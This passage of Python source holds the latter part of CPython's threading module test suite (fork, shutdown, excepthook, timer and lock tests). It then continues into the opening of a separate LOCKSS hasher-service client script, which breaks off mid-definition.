l = enum()
self.assertNotIn(t, l,
"#1703448 triggered after %d trials: %s" % (i, l))
finally:
sys.setswitchinterval(old_interval)
def test_no_refcycle_through_target(self):
class RunSelfFunction(object):
def __init__(self, should_raise):
# The links in this refcycle from Thread back to self
# should be cleaned up when the thread completes.
self.should_raise = should_raise
self.thread = threading.Thread(target=self._run,
args=(self,),
kwargs={'yet_another':self})
self.thread.start()
def _run(self, other_ref, yet_another):
if self.should_raise:
raise SystemExit
restore_default_excepthook(self)
cyclic_object = RunSelfFunction(should_raise=False)
weak_cyclic_object = weakref.ref(cyclic_object)
cyclic_object.thread.join()
del cyclic_object
self.assertIsNone(weak_cyclic_object(),
msg=('%d references still around' %
sys.getrefcount(weak_cyclic_object())))
raising_cyclic_object = RunSelfFunction(should_raise=True)
weak_raising_cyclic_object = weakref.ref(raising_cyclic_object)
raising_cyclic_object.thread.join()
del raising_cyclic_object
self.assertIsNone(weak_raising_cyclic_object(),
msg=('%d references still around' %
sys.getrefcount(weak_raising_cyclic_object())))
def test_old_threading_api(self):
# Just a quick sanity check to make sure the old method names are
# still present
t = threading.Thread()
with self.assertWarnsRegex(DeprecationWarning,
r'get the daemon attribute'):
t.isDaemon()
with self.assertWarnsRegex(DeprecationWarning,
r'set the daemon attribute'):
t.setDaemon(True)
with self.assertWarnsRegex(DeprecationWarning,
r'get the name attribute'):
t.getName()
with self.assertWarnsRegex(DeprecationWarning,
r'set the name attribute'):
t.setName("name")
e = threading.Event()
with self.assertWarnsRegex(DeprecationWarning, 'use is_set()'):
e.isSet()
cond = threading.Condition()
cond.acquire()
with self.assertWarnsRegex(DeprecationWarning, 'use notify_all()'):
cond.notifyAll()
with self.assertWarnsRegex(DeprecationWarning, 'use active_count()'):
threading.activeCount()
with self.assertWarnsRegex(DeprecationWarning, 'use current_thread()'):
threading.currentThread()
def test_repr_daemon(self):
t = threading.Thread()
self.assertNotIn('daemon', repr(t))
t.daemon = True
self.assertIn('daemon', repr(t))
def test_daemon_param(self):
t = threading.Thread()
self.assertFalse(t.daemon)
t = threading.Thread(daemon=False)
self.assertFalse(t.daemon)
t = threading.Thread(daemon=True)
self.assertTrue(t.daemon)
@support.requires_fork()
def test_fork_at_exit(self):
# bpo-42350: Calling os.fork() after threading._shutdown() must
# not log an error.
code = textwrap.dedent("""
import atexit
import os
import sys
from test.support import wait_process
# Import the threading module to register its "at fork" callback
import threading
def exit_handler():
pid = os.fork()
if not pid:
print("child process ok", file=sys.stderr, flush=True)
# child process
else:
wait_process(pid, exitcode=0)
# exit_handler() will be called after threading._shutdown()
atexit.register(exit_handler)
""")
_, out, err = assert_python_ok("-c", code)
self.assertEqual(out, b'')
self.assertEqual(err.rstrip(), b'child process ok')
@support.requires_fork()
def test_dummy_thread_after_fork(self):
# Issue #14308: a dummy thread in the active list doesn't mess up
# the after-fork mechanism.
code = """if 1:
import _thread, threading, os, time
def background_thread(evt):
# Creates and registers the _DummyThread instance
threading.current_thread()
evt.set()
time.sleep(10)
evt = threading.Event()
_thread.start_new_thread(background_thread, (evt,))
evt.wait()
assert threading.active_count() == 2, threading.active_count()
if os.fork() == 0:
assert threading.active_count() == 1, threading.active_count()
os._exit(0)
else:
os.wait()
"""
_, out, err = assert_python_ok("-c", code)
self.assertEqual(out, b'')
self.assertEqual(err, b'')
@support.requires_fork()
def test_is_alive_after_fork(self):
# Try hard to trigger #18418: is_alive() could sometimes be True on
# threads that vanished after a fork.
old_interval = sys.getswitchinterval()
self.addCleanup(sys.setswitchinterval, old_interval)
# Make the bug more likely to manifest.
test.support.setswitchinterval(1e-6)
for i in range(20):
t = threading.Thread(target=lambda: None)
t.start()
pid = os.fork()
if pid == 0:
os._exit(11 if t.is_alive() else 10)
else:
t.join()
support.wait_process(pid, exitcode=10)
def test_main_thread(self):
main = threading.main_thread()
self.assertEqual(main.name, 'MainThread')
self.assertEqual(main.ident, threading.current_thread().ident)
self.assertEqual(main.ident, threading.get_ident())
def f():
self.assertNotEqual(threading.main_thread().ident,
threading.current_thread().ident)
th = threading.Thread(target=f)
th.start()
th.join()
@support.requires_fork()
@unittest.skipUnless(hasattr(os, 'waitpid'), "test needs os.waitpid()")
def test_main_thread_after_fork(self):
code = """if 1:
import os, threading
from test import support
pid = os.fork()
if pid == 0:
main = threading.main_thread()
print(main.name)
print(main.ident == threading.current_thread().ident)
print(main.ident == threading.get_ident())
else:
support.wait_process(pid, exitcode=0)
"""
_, out, err = assert_python_ok("-c", code)
data = out.decode().replace('\r', '')
self.assertEqual(err, b"")
self.assertEqual(data, "MainThread\nTrue\nTrue\n")
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
@support.requires_fork()
@unittest.skipUnless(hasattr(os, 'waitpid'), "test needs os.waitpid()")
def test_main_thread_after_fork_from_nonmain_thread(self):
code = """if 1:
import os, threading, sys
from test import support
def func():
pid = os.fork()
if pid == 0:
main = threading.main_thread()
print(main.name)
print(main.ident == threading.current_thread().ident)
print(main.ident == threading.get_ident())
# stdout is fully buffered because not a tty,
# we have to flush before exit.
sys.stdout.flush()
else:
support.wait_process(pid, exitcode=0)
th = threading.Thread(target=func)
th.start()
th.join()
"""
_, out, err = assert_python_ok("-c", code)
data = out.decode().replace('\r', '')
self.assertEqual(err, b"")
self.assertEqual(data, "Thread-1 (func)\nTrue\nTrue\n")
def test_main_thread_during_shutdown(self):
# bpo-31516: current_thread() should still point to the main thread
# at shutdown
code = """if 1:
import gc, threading
main_thread = threading.current_thread()
assert main_thread is threading.main_thread() # sanity check
class RefCycle:
def __init__(self):
self.cycle = self
def __del__(self):
print("GC:",
threading.current_thread() is main_thread,
threading.main_thread() is main_thread,
threading.enumerate() == [main_thread])
RefCycle()
gc.collect() # sanity check
x = RefCycle()
"""
_, out, err = assert_python_ok("-c", code)
data = out.decode()
self.assertEqual(err, b"")
self.assertEqual(data.splitlines(),
["GC: True True True"] * 2)
def test_finalization_shutdown(self):
# bpo-36402: Py_Finalize() calls threading._shutdown() which must wait
# until Python thread states of all non-daemon threads get deleted.
#
# Test similar to SubinterpThreadingTests.test_threads_join_2(), but
# test the finalization of the main interpreter.
code = """if 1:
import os
import threading
import time
import random
def random_sleep():
seconds = random.random() * 0.010
time.sleep(seconds)
class Sleeper:
def __del__(self):
random_sleep()
tls = threading.local()
def f():
# Sleep a bit so that the thread is still running when
# Py_Finalize() is called.
random_sleep()
tls.x = Sleeper()
random_sleep()
threading.Thread(target=f).start()
random_sleep()
"""
rc, out, err = assert_python_ok("-c", code)
self.assertEqual(err, b"")
def test_tstate_lock(self):
# Test an implementation detail of Thread objects.
started = _thread.allocate_lock()
finish = _thread.allocate_lock()
started.acquire()
finish.acquire()
def f():
started.release()
finish.acquire()
time.sleep(0.01)
# The tstate lock is None until the thread is started
t = threading.Thread(target=f)
self.assertIs(t._tstate_lock, None)
t.start()
started.acquire()
self.assertTrue(t.is_alive())
# The tstate lock can't be acquired when the thread is running
# (or suspended).
tstate_lock = t._tstate_lock
self.assertFalse(tstate_lock.acquire(timeout=0), False)
finish.release()
# When the thread ends, the state_lock can be successfully
# acquired.
self.assertTrue(tstate_lock.acquire(timeout=support.SHORT_TIMEOUT), False)
# But is_alive() is still True: we hold _tstate_lock now, which
# prevents is_alive() from knowing the thread's end-of-life C code
# is done.
self.assertTrue(t.is_alive())
# Let is_alive() find out the C code is done.
tstate_lock.release()
self.assertFalse(t.is_alive())
# And verify the thread disposed of _tstate_lock.
self.assertIsNone(t._tstate_lock)
t.join()
def test_repr_stopped(self):
# Verify that "stopped" shows up in repr(Thread) appropriately.
started = _thread.allocate_lock()
finish = _thread.allocate_lock()
started.acquire()
finish.acquire()
def f():
started.release()
finish.acquire()
t = threading.Thread(target=f)
t.start()
started.acquire()
self.assertIn("started", repr(t))
finish.release()
# "stopped" should appear in the repr in a reasonable amount of time.
# Implementation detail: as of this writing, that's trivially true
# if .join() is called, and almost trivially true if .is_alive() is
# called. The detail we're testing here is that "stopped" shows up
# "all on its own".
LOOKING_FOR = "stopped"
for i in range(500):
if LOOKING_FOR in repr(t):
break
time.sleep(0.01)
self.assertIn(LOOKING_FOR, repr(t)) # we waited at least 5 seconds
t.join()
def test_BoundedSemaphore_limit(self):
# BoundedSemaphore should raise ValueError if released too often.
for limit in range(1, 10):
bs = threading.BoundedSemaphore(limit)
threads = [threading.Thread(target=bs.acquire)
for _ in range(limit)]
for t in threads:
t.start()
for t in threads:
t.join()
threads = [threading.Thread(target=bs.release)
for _ in range(limit)]
for t in threads:
t.start()
for t in threads:
t.join()
self.assertRaises(ValueError, bs.release)
@cpython_only
def test_frame_tstate_tracing(self):
# Issue #14432: Crash when a generator is created in a C thread that is
# destroyed while the generator is still used. The issue was that a
# generator contains a frame, and the frame kept a reference to the
# Python state of the destroyed C thread. The crash occurs when a trace
# function is setup.
def noop_trace(frame, event, arg):
# no operation
return noop_trace
def generator():
while 1:
yield "generator"
def callback():
if callback.gen is None:
callback.gen = generator()
return next(callback.gen)
callback.gen = None
old_trace = sys.gettrace()
sys.settrace(noop_trace)
try:
# Install a trace function
threading.settrace(noop_trace)
# Create a generator in a C thread which exits after the call
import _testcapi
_testcapi.call_in_temporary_c_thread(callback)
# Call the generator in a different Python thread, check that the
# generator didn't keep a reference to the destroyed thread state
for test in range(3):
# The trace function is still called here
callback()
finally:
sys.settrace(old_trace)
def test_gettrace(self):
def noop_trace(frame, event, arg):
# no operation
return noop_trace
old_trace = threading.gettrace()
try:
threading.settrace(noop_trace)
trace_func = threading.gettrace()
self.assertEqual(noop_trace,trace_func)
finally:
threading.settrace(old_trace)
def test_getprofile(self):
def fn(*args): pass
old_profile = threading.getprofile()
try:
threading.setprofile(fn)
self.assertEqual(fn, threading.getprofile())
finally:
threading.setprofile(old_profile)
@cpython_only
def test_shutdown_locks(self):
for daemon in (False, True):
with self.subTest(daemon=daemon):
event = threading.Event()
thread = threading.Thread(target=event.wait, daemon=daemon)
# Thread.start() must add lock to _shutdown_locks,
# but only for non-daemon thread
thread.start()
tstate_lock = thread._tstate_lock
if not daemon:
self.assertIn(tstate_lock, threading._shutdown_locks)
else:
self.assertNotIn(tstate_lock, threading._shutdown_locks)
# unblock the thread and join it
event.set()
thread.join()
# Thread._stop() must remove tstate_lock from _shutdown_locks.
# Daemon threads must never add it to _shutdown_locks.
self.assertNotIn(tstate_lock, threading._shutdown_locks)
def test_locals_at_exit(self):
# bpo-19466: thread locals must not be deleted before destructors
# are called
rc, out, err = assert_python_ok("-c", """if 1:
import threading
class Atexit:
def __del__(self):
print("thread_dict.atexit = %r" % thread_dict.atexit)
thread_dict = threading.local()
thread_dict.atexit = "value"
atexit = Atexit()
""")
self.assertEqual(out.rstrip(), b"thread_dict.atexit = 'value'")
def test_boolean_target(self):
# bpo-41149: A thread that had a boolean value of False would not
# run, regardless of whether it was callable. The correct behaviour
# is for a thread to do nothing if its target is None, and to call
# the target otherwise.
class BooleanTarget(object):
def __init__(self):
self.ran = False
def __bool__(self):
return False
def __call__(self):
self.ran = True
target = BooleanTarget()
thread = threading.Thread(target=target)
thread.start()
thread.join()
self.assertTrue(target.ran)
def test_leak_without_join(self):
# bpo-37788: Test that a thread which is not joined explicitly
# does not leak. Test written for reference leak checks.
def noop(): pass
with threading_helper.wait_threads_exit():
threading.Thread(target=noop).start()
# Thread.join() is not called
def test_import_from_another_thread(self):
# bpo-1596321: If the threading module is first import from a thread
# different than the main thread, threading._shutdown() must handle
# this case without logging an error at Python exit.
code = textwrap.dedent('''
import _thread
import sys
event = _thread.allocate_lock()
event.acquire()
def import_threading():
import threading
event.release()
if 'threading' in sys.modules:
raise Exception('threading is already imported')
_thread.start_new_thread(import_threading, ())
# wait until the threading module is imported
event.acquire()
event.release()
if 'threading' not in sys.modules:
raise Exception('threading is not imported')
# don't wait until the thread completes
''')
rc, out, err = assert_python_ok("-c", code)
self.assertEqual(out, b'')
self.assertEqual(err, b'')
class ThreadJoinOnShutdown(BaseTestCase):
def _run_and_join(self, script):
script = """if 1:
import sys, os, time, threading
# a thread, which waits for the main program to terminate
def joiningfunc(mainthread):
mainthread.join()
print('end of thread')
# stdout is fully buffered because not a tty, we have to flush
# before exit.
sys.stdout.flush()
\n""" + script
rc, out, err = assert_python_ok("-c", script)
data = out.decode().replace('\r', '')
self.assertEqual(data, "end of main\nend of thread\n")
def test_1_join_on_shutdown(self):
# The usual case: on exit, wait for a non-daemon thread
script = """if 1:
import os
t = threading.Thread(target=joiningfunc,
args=(threading.current_thread(),))
t.start()
time.sleep(0.1)
print('end of main')
"""
self._run_and_join(script)
@support.requires_fork()
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
def test_2_join_in_forked_process(self):
# Like the test above, but from a forked interpreter
script = """if 1:
from test import support
childpid = os.fork()
if childpid != 0:
# parent process
support.wait_process(childpid, exitcode=0)
sys.exit(0)
# child process
t = threading.Thread(target=joiningfunc,
args=(threading.current_thread(),))
t.start()
print('end of main')
"""
self._run_and_join(script)
@support.requires_fork()
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
def test_3_join_in_forked_from_thread(self):
# Like the test above, but fork() was called from a worker thread
# In the forked process, the main Thread object must be marked as stopped.
script = """if 1:
from test import support
main_thread = threading.current_thread()
def worker():
childpid = os.fork()
if childpid != 0:
# parent process
support.wait_process(childpid, exitcode=0)
sys.exit(0)
# child process
t = threading.Thread(target=joiningfunc,
args=(main_thread,))
print('end of main')
t.start()
t.join() # Should not block: main_thread is already stopped
w = threading.Thread(target=worker)
w.start()
"""
self._run_and_join(script)
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
def test_4_daemon_threads(self):
# Check that a daemon thread cannot crash the interpreter on shutdown
# by manipulating internal structures that are being disposed of in
# the main thread.
script = """if True:
import os
import random
import sys
import time
import threading
thread_has_run = set()
def random_io():
'''Loop for a while sleeping random tiny amounts and doing some I/O.'''
import test.test_threading as mod
while True:
with open(mod.__file__, 'rb') as in_f:
stuff = in_f.read(200)
with open(os.devnull, 'wb') as null_f:
null_f.write(stuff)
time.sleep(random.random() / 1995)
thread_has_run.add(threading.current_thread())
def main():
count = 0
for _ in range(40):
new_thread = threading.Thread(target=random_io)
new_thread.daemon = True
new_thread.start()
count += 1
while len(thread_has_run) < count:
time.sleep(0.001)
# Trigger process shutdown
sys.exit(0)
main()
"""
rc, out, err = assert_python_ok('-c', script)
self.assertFalse(err)
@support.requires_fork()
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
def test_reinit_tls_after_fork(self):
# Issue #13817: fork() would deadlock in a multithreaded program with
# the ad-hoc TLS implementation.
def do_fork_and_wait():
# just fork a child process and wait it
pid = os.fork()
if pid > 0:
support.wait_process(pid, exitcode=50)
else:
os._exit(50)
# start a bunch of threads that will fork() child processes
threads = []
for i in range(16):
t = threading.Thread(target=do_fork_and_wait)
threads.append(t)
t.start()
for t in threads:
t.join()
@support.requires_fork()
def test_clear_threads_states_after_fork(self):
# Issue #17094: check that threads states are cleared after fork()
# start a bunch of threads
threads = []
for i in range(16):
t = threading.Thread(target=lambda : time.sleep(0.3))
threads.append(t)
t.start()
pid = os.fork()
if pid == 0:
# check that threads states have been cleared
if len(sys._current_frames()) == 1:
os._exit(51)
else:
os._exit(52)
else:
support.wait_process(pid, exitcode=51)
for t in threads:
t.join()
class SubinterpThreadingTests(BaseTestCase):
def pipe(self):
r, w = os.pipe()
self.addCleanup(os.close, r)
self.addCleanup(os.close, w)
if hasattr(os, 'set_blocking'):
os.set_blocking(r, False)
return (r, w)
def test_threads_join(self):
# Non-daemon threads should be joined at subinterpreter shutdown
# (issue #18808)
r, w = self.pipe()
code = textwrap.dedent(r"""
import os
import random
import threading
import time
def random_sleep():
seconds = random.random() * 0.010
time.sleep(seconds)
def f():
# Sleep a bit so that the thread is still running when
# Py_EndInterpreter is called.
random_sleep()
os.write(%d, b"x")
threading.Thread(target=f).start()
random_sleep()
""" % (w,))
ret = test.support.run_in_subinterp(code)
self.assertEqual(ret, 0)
# The thread was joined properly.
self.assertEqual(os.read(r, 1), b"x")
def test_threads_join_2(self):
# Same as above, but a delay gets introduced after the thread's
# Python code returned but before the thread state is deleted.
# To achieve this, we register a thread-local object which sleeps
# a bit when deallocated.
r, w = self.pipe()
code = textwrap.dedent(r"""
import os
import random
import threading
import time
def random_sleep():
seconds = random.random() * 0.010
time.sleep(seconds)
class Sleeper:
def __del__(self):
random_sleep()
tls = threading.local()
def f():
# Sleep a bit so that the thread is still running when
# Py_EndInterpreter is called.
random_sleep()
tls.x = Sleeper()
os.write(%d, b"x")
threading.Thread(target=f).start()
random_sleep()
""" % (w,))
ret = test.support.run_in_subinterp(code)
self.assertEqual(ret, 0)
# The thread was joined properly.
self.assertEqual(os.read(r, 1), b"x")
@cpython_only
def test_daemon_threads_fatal_error(self):
subinterp_code = f"""if 1:
import os
import threading
import time
def f():
# Make sure the daemon thread is still running when
# Py_EndInterpreter is called.
time.sleep({test.support.SHORT_TIMEOUT})
threading.Thread(target=f, daemon=True).start()
"""
script = r"""if 1:
import _testcapi
_testcapi.run_in_subinterp(%r)
""" % (subinterp_code,)
with test.support.SuppressCrashReport():
rc, out, err = assert_python_failure("-c", script)
self.assertIn("Fatal Python error: Py_EndInterpreter: "
"not the last thread", err.decode())
class ThreadingExceptionTests(BaseTestCase):
# A RuntimeError should be raised if Thread.start() is called
# multiple times.
def test_start_thread_again(self):
thread = threading.Thread()
thread.start()
self.assertRaises(RuntimeError, thread.start)
thread.join()
def test_joining_current_thread(self):
current_thread = threading.current_thread()
self.assertRaises(RuntimeError, current_thread.join);
def test_joining_inactive_thread(self):
thread = threading.Thread()
self.assertRaises(RuntimeError, thread.join)
def test_daemonize_active_thread(self):
thread = threading.Thread()
thread.start()
self.assertRaises(RuntimeError, setattr, thread, "daemon", True)
thread.join()
def test_releasing_unacquired_lock(self):
lock = threading.Lock()
self.assertRaises(RuntimeError, lock.release)
@requires_subprocess()
def test_recursion_limit(self):
# Issue 9670
# test that excessive recursion within a non-main thread causes
# an exception rather than crashing the interpreter on platforms
# like Mac OS X or FreeBSD which have small default stack sizes
# for threads
script = """if True:
import threading
def recurse():
return recurse()
def outer():
try:
recurse()
except RecursionError:
pass
w = threading.Thread(target=outer)
w.start()
w.join()
print('end of main thread')
"""
expected_output = "end of main thread\n"
p = subprocess.Popen([sys.executable, "-c", script],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout, stderr = p.communicate()
data = stdout.decode().replace('\r', '')
self.assertEqual(p.returncode, 0, "Unexpected error: " + stderr.decode())
self.assertEqual(data, expected_output)
def test_print_exception(self):
script = r"""if True:
import threading
import time
running = False
def run():
global running
running = True
while running:
time.sleep(0.01)
1/0
t = threading.Thread(target=run)
t.start()
while not running:
time.sleep(0.01)
running = False
t.join()
"""
rc, out, err = assert_python_ok("-c", script)
self.assertEqual(out, b'')
err = err.decode()
self.assertIn("Exception in thread", err)
self.assertIn("Traceback (most recent call last):", err)
self.assertIn("ZeroDivisionError", err)
self.assertNotIn("Unhandled exception", err)
def test_print_exception_stderr_is_none_1(self):
script = r"""if True:
import sys
import threading
import time
running = False
def run():
global running
running = True
while running:
time.sleep(0.01)
1/0
t = threading.Thread(target=run)
t.start()
while not running:
time.sleep(0.01)
sys.stderr = None
running = False
t.join()
"""
rc, out, err = assert_python_ok("-c", script)
self.assertEqual(out, b'')
err = err.decode()
self.assertIn("Exception in thread", err)
self.assertIn("Traceback (most recent call last):", err)
self.assertIn("ZeroDivisionError", err)
self.assertNotIn("Unhandled exception", err)
def test_print_exception_stderr_is_none_2(self):
script = r"""if True:
import sys
import threading
import time
running = False
def run():
global running
running = True
while running:
time.sleep(0.01)
1/0
sys.stderr = None
t = threading.Thread(target=run)
t.start()
while not running:
time.sleep(0.01)
running = False
t.join()
"""
rc, out, err = assert_python_ok("-c", script)
self.assertEqual(out, b'')
self.assertNotIn("Unhandled exception", err.decode())
def test_bare_raise_in_brand_new_thread(self):
def bare_raise():
raise
class Issue27558(threading.Thread):
exc = None
def run(self):
try:
bare_raise()
except Exception as exc:
self.exc = exc
thread = Issue27558()
thread.start()
thread.join()
self.assertIsNotNone(thread.exc)
self.assertIsInstance(thread.exc, RuntimeError)
# explicitly break the reference cycle to not leak a dangling thread
thread.exc = None
def test_multithread_modify_file_noerror(self):
# See issue25872
def modify_file():
with open(os_helper.TESTFN, 'w', encoding='utf-8') as fp:
fp.write(' ')
traceback.format_stack()
self.addCleanup(os_helper.unlink, os_helper.TESTFN)
threads = [
threading.Thread(target=modify_file)
for i in range(100)
]
for t in threads:
t.start()
t.join()
class ThreadRunFail(threading.Thread):
def run(self):
raise ValueError("run failed")
class ExceptHookTests(BaseTestCase):
def setUp(self):
restore_default_excepthook(self)
super().setUp()
def test_excepthook(self):
with support.captured_output("stderr") as stderr:
thread = ThreadRunFail(name="excepthook thread")
thread.start()
thread.join()
stderr = stderr.getvalue().strip()
self.assertIn(f'Exception in thread {thread.name}:\n', stderr)
self.assertIn('Traceback (most recent call last):\n', stderr)
self.assertIn(' raise ValueError("run failed")', stderr)
self.assertIn('ValueError: run failed', stderr)
@support.cpython_only
def test_excepthook_thread_None(self):
# threading.excepthook called with thread=None: log the thread
# identifier in this case.
with support.captured_output("stderr") as stderr:
try:
raise ValueError("bug")
except Exception as exc:
args = threading.ExceptHookArgs([*sys.exc_info(), None])
try:
threading.excepthook(args)
finally:
# Explicitly break a reference cycle
args = None
stderr = stderr.getvalue().strip()
self.assertIn(f'Exception in thread {threading.get_ident()}:\n', stderr)
self.assertIn('Traceback (most recent call last):\n', stderr)
self.assertIn(' raise ValueError("bug")', stderr)
self.assertIn('ValueError: bug', stderr)
def test_system_exit(self):
class ThreadExit(threading.Thread):
def run(self):
sys.exit(1)
# threading.excepthook() silently ignores SystemExit
with support.captured_output("stderr") as stderr:
thread = ThreadExit()
thread.start()
thread.join()
self.assertEqual(stderr.getvalue(), '')
def test_custom_excepthook(self):
args = None
def hook(hook_args):
nonlocal args
args = hook_args
try:
with support.swap_attr(threading, 'excepthook', hook):
thread = ThreadRunFail()
thread.start()
thread.join()
self.assertEqual(args.exc_type, ValueError)
self.assertEqual(str(args.exc_value), 'run failed')
self.assertEqual(args.exc_traceback, args.exc_value.__traceback__)
self.assertIs(args.thread, thread)
finally:
# Break reference cycle
args = None
def test_custom_excepthook_fail(self):
def threading_hook(args):
raise ValueError("threading_hook failed")
err_str = None
def sys_hook(exc_type, exc_value, exc_traceback):
nonlocal err_str
err_str = str(exc_value)
with support.swap_attr(threading, 'excepthook', threading_hook), \
support.swap_attr(sys, 'excepthook', sys_hook), \
support.captured_output('stderr') as stderr:
thread = ThreadRunFail()
thread.start()
thread.join()
self.assertEqual(stderr.getvalue(),
'Exception in threading.excepthook:\n')
self.assertEqual(err_str, 'threading_hook failed')
def test_original_excepthook(self):
def run_thread():
with support.captured_output("stderr") as output:
thread = ThreadRunFail(name="excepthook thread")
thread.start()
thread.join()
return output.getvalue()
def threading_hook(args):
print("Running a thread failed", file=sys.stderr)
default_output = run_thread()
with support.swap_attr(threading, 'excepthook', threading_hook):
custom_hook_output = run_thread()
threading.excepthook = threading.__excepthook__
recovered_output = run_thread()
self.assertEqual(default_output, recovered_output)
self.assertNotEqual(default_output, custom_hook_output)
self.assertEqual(custom_hook_output, "Running a thread failed\n")
class TimerTests(BaseTestCase):
def setUp(self):
BaseTestCase.setUp(self)
self.callback_args = []
self.callback_event = threading.Event()
def test_init_immutable_default_args(self):
# Issue 17435: constructor defaults were mutable objects, they could be
# mutated via the object attributes and affect other Timer objects.
timer1 = threading.Timer(0.01, self._callback_spy)
timer1.start()
self.callback_event.wait()
timer1.args.append("blah")
timer1.kwargs["foo"] = "bar"
self.callback_event.clear()
timer2 = threading.Timer(0.01, self._callback_spy)
timer2.start()
self.callback_event.wait()
self.assertEqual(len(self.callback_args), 2)
self.assertEqual(self.callback_args, [((), {}), ((), {})])
timer1.join()
timer2.join()
def _callback_spy(self, *args, **kwargs):
self.callback_args.append((args[:], kwargs.copy()))
self.callback_event.set()
class LockTests(lock_tests.LockTests):
locktype = staticmethod(threading.Lock)
class PyRLockTests(lock_tests.RLockTests):
locktype = staticmethod(threading._PyRLock)
@unittest.skipIf(threading._CRLock is None, 'RLock not implemented in C')
class CRLockTests(lock_tests.RLockTests):
locktype = staticmethod(threading._CRLock)
class EventTests(lock_tests.EventTests):
eventtype = staticmethod(threading.Event)
class ConditionAsRLockTests(lock_tests.RLockTests):
# Condition uses an RLock by default and exports its API.
locktype = staticmethod(threading.Condition)
class ConditionTests(lock_tests.ConditionTests):
condtype = staticmethod(threading.Condition)
class SemaphoreTests(lock_tests.SemaphoreTests):
semtype = staticmethod(threading.Semaphore)
class BoundedSemaphoreTests(lock_tests.BoundedSemaphoreTests):
semtype = staticmethod(threading.BoundedSemaphore)
class BarrierTests(lock_tests.BarrierTests):
barriertype = staticmethod(threading.Barrier)
class MiscTestCase(unittest.TestCase):
def test__all__(self):
restore_default_excepthook(self)
extra = {"ThreadError"}
not_exported = {'currentThread', 'activeCount'}
support.check__all__(self, threading, ('threading', '_thread'),
extra=extra, not_exported=not_exported)
class InterruptMainTests(unittest.TestCase):
def check_interrupt_main_with_signal_handler(self, signum):
def handler(signum, frame):
1/0
old_handler = signal.signal(signum, handler)
self.addCleanup(signal.signal, signum, old_handler)
with self.assertRaises(ZeroDivisionError):
_thread.interrupt_main()
def check_interrupt_main_noerror(self, signum):
handler = signal.getsignal(signum)
try:
# No exception should arise.
signal.signal(signum, signal.SIG_IGN)
_thread.interrupt_main(signum)
signal.signal(signum, signal.SIG_DFL)
_thread.interrupt_main(signum)
finally:
# Restore original handler
signal.signal(signum, handler)
def test_interrupt_main_subthread(self):
# Calling start_new_thread with a function that executes interrupt_main
# should raise KeyboardInterrupt upon completion.
def call_interrupt():
_thread.interrupt_main()
t = threading.Thread(target=call_interrupt)
with self.assertRaises(KeyboardInterrupt):
t.start()
t.join()
t.join()
def test_interrupt_main_mainthread(self):
# Make sure that if interrupt_main is called in main thread that
# KeyboardInterrupt is raised instantly.
with self.assertRaises(KeyboardInterrupt):
_thread.interrupt_main()
def test_interrupt_main_with_signal_handler(self):
self.check_interrupt_main_with_signal_handler(signal.SIGINT)
self.check_interrupt_main_with_signal_handler(signal.SIGTERM)
def test_interrupt_main_noerror(self):
self.check_interrupt_main_noerror(signal.SIGINT)
self.check_interrupt_main_noerror(signal.SIGTERM)
def test_interrupt_main_invalid_signal(self):
self.assertRaises(ValueError, _thread.interrupt_main, -1)
self.assertRaises(ValueError, _thread.interrupt_main, signal.NSIG)
self.assertRaises(ValueError, _thread.interrupt_main, 1000000)
@threading_helper.reap_threads
def test_can_interrupt_tight_loops(self):
cont = [True]
started = [False]
interrupted = [False]
def worker(started, cont, interrupted):
iterations = 100_000_000
started[0] = True
while cont[0]:
if iterations:
iterations -= 1
else:
return
pass
interrupted[0] = True
t = threading.Thread(target=worker,args=(started, cont, interrupted))
t.start()
while not started[0]:
pass
cont[0] = False
t.join()
self.assertTrue(interrupted[0])
class AtexitTests(unittest.TestCase):
def test_atexit_output(self):
rc, out, err = assert_python_ok("-c", """if True:
import threading
def run_last():
print('parrot')
threading._register_atexit(run_last)
""")
self.assertFalse(err)
self.assertEqual(out.strip(), b'parrot')
def test_atexit_called_once(self):
rc, out, err = assert_python_ok("-c", """if True:
import threading
from unittest.mock import Mock
mock = Mock()
threading._register_atexit(mock)
mock.assert_not_called()
# force early shutdown to ensure it was called once
threading._shutdown()
mock.assert_called_once()
""")
self.assertFalse(err)
def test_atexit_after_shutdown(self):
# The only way to do this is by registering an atexit within
# an atexit, which is intended to raise an exception.
rc, out, err = assert_python_ok("-c", """if True:
import threading
def func():
pass
def run_last():
threading._register_atexit(func)
threading._register_atexit(run_last)
""")
self.assertTrue(err)
self.assertIn("RuntimeError: can't register atexit after shutdown",
err.decode())
if __name__ == "__main__":
unittest.main()
|
hasherservice.py
|
#!/usr/bin/env python
'''A library and a command line tool to interact with the LOCKSS daemon hasher
service via its Web Services API.'''
# $Id$
__copyright__ = '''\
Copyright (c) 2000-2016 Board of Trustees of Leland Stanford Jr. University,
all rights reserved.
'''
__license__ = '''\
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
STANFORD UNIVERSITY BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR
IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
Except as contained in this notice, the name of Stanford University shall not
be used in advertising or otherwise to promote the sale, use or other dealings
in this Software without prior written authorization from Stanford University.
'''
__version__ = '0.4.1'
import getpass
from multiprocessing.dummy import Pool as ThreadPool
import optparse
import os.path
import sys
import time
from threading import Thread
import HasherServiceImplService_client
from wsutil import zsiauth
def hash_au(host, auth, auid):
'''Returns the full hash of the given AU
'''
req = HasherServiceImplService_client.hash()
req.HasherParams = req.new_hasherParams()
req.HasherParams.AuId = auid
return _ws_port(host, auth).hash(req).Return
def hash_au_url(host, auth, auid, url):
